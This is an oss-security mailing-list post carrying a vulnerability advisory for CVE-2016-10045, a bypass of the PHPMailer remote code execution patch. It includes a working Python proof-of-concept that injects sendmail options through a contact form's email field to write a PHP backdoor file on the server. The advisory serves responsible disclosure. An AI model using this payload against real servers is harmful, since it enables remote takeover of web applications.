Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 28 Dec 2016 03:03:39 -0200
From: Dawid Golunski <dawid@...alhackers.com>
To: oss-security@...ts.openwall.com
Subject: PHPMailer < 5.2.20 Remote Code Execution PoC 0day Exploit
 (CVE-2016-10045) (Bypass of the CVE-2016-1033 patch)

PHPMailer < 5.2.20 Remote Code Execution PoC 0day Exploit
(CVE-2016-10045) (Bypass for the CVE-2016-1033 patch)

Discovered by Dawid Golunski (@...id_golunski)
https://legalhackers.com

Desc:

I discovered that the current PHPMailer versions (< 5.2.20) were still
vulnerable to RCE as it is possible to bypass the currently available
patch.

This was reported responsibly to the vendor & assigned a CVEID on the
26th of December.
The vendor has been working on a new patch which would fix the problem but
not break the RFC too badly. The patch should be published very soon.

I'm releasing this as a 0day without the new patch available publicly
as a potential bypass was publicly discussed on oss-sec with Solar
Designer in the PHPMailer < 5.2.18 thread, so holding the advisory
further would serve no purpose.


Current advisory URL:

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html

More updates soon at:

https://twitter.com/dawid_golunski


-- 
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski



    __                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
           /____/                                                   



=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10045
- Release date: 27.12.2016
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

PHPMailer < 5.2.20 Remote Code Execution (Patch Bypass)


II. BACKGROUND
-------------------------

"PHPMailer continues to be the world's most popular transport class, with an
estimated 9 million users worldwide. Downloads continue at a significant
pace daily."

http://phpmailer.worxware.com/


"Probably the world's most popular code for sending email from PHP!
Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii,
Joomla! and many more"

https://github.com/PHPMailer/PHPMailer


III. INTRODUCTION
-------------------------

An independent research uncovered a critical vulnerability in PHPMailer that 
could potentially be used by (unauthenticated) remote attackers to achieve 
remote arbitrary code execution in the context of the web server user and 
remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the PHPMailer class.

The first patch of the vulnerability CVE-2016-10033 was incomplete.
This advisory demonstrates the bypass of the patch.

IV. DESCRIPTION
-------------------------


The patch for CVE-2016-10033 vulnerability does not take into account
the clashing of the escapeshellarg() function with internal escaping
(escapeshellcmd() function) of mail().

As a result it is possible to inject an extra quote that does not get
properly escaped as demonstrated by the PoC below.



V. PROOF OF CONCEPT EXPLOIT
-------------------------

#!/usr/bin/python

#PHPMailer_RCE_exploit.pl

intro = """
PHPMailer RCE PoC Exploits

PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)

Discovered and Coded by:

 Dawid Golunski
 @dawid_golunski
 https://legalhackers.com

"""
usage = """
Usage:

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt

PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Disclaimer:
For testing purposes only. Do no harm.

"""

import time
import urllib
import urllib2
import socket
import sys

RW_DIR = "/var/www/html/uploads"

url = 'http://VictimWebServer/contact_form.php' # Set destination URL here

# Choose/uncomment one of the payloads:

# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@...il.com' % RW_DIR

# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@...il.com" % RW_DIR

######################################

# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"

post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}

# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()



~~~~~~~~~~~

The researcher also developed an Unauthenticated RCE exploit for a popular 
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has 
fixed the vulnerabilities.

Video PoC:
~~~~~~~~~~~~~

https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html


VI. BUSINESS IMPACT
-------------------------

A successful exploitation could let remote attackers to gain access to 
the target server in the context of the web server account which could
lead to a full compromise of the web application.

 
VII. SYSTEMS AFFECTED
-------------------------

All current versions of PHPMailer <5.2.20 are affected.

Note that exploitation is not limited to systems with Sendmail MTA.


VIII. SOLUTION
-------------------------

The vendor will issue the new version shortly.

 
IX. REFERENCES
-------------------------

https://legalhackers.com

This advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html

Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10045/PHPMailer_RCE_exploit.pl

Other exploits with other attack vectors will be disclosed at a later date to 
allow more time for patching.

CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045

PHPMailer / Vendor security updates / notices:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
 
XI. REVISION HISTORY
-------------------------

27.12.2016 - Advisory released
 

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.






Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ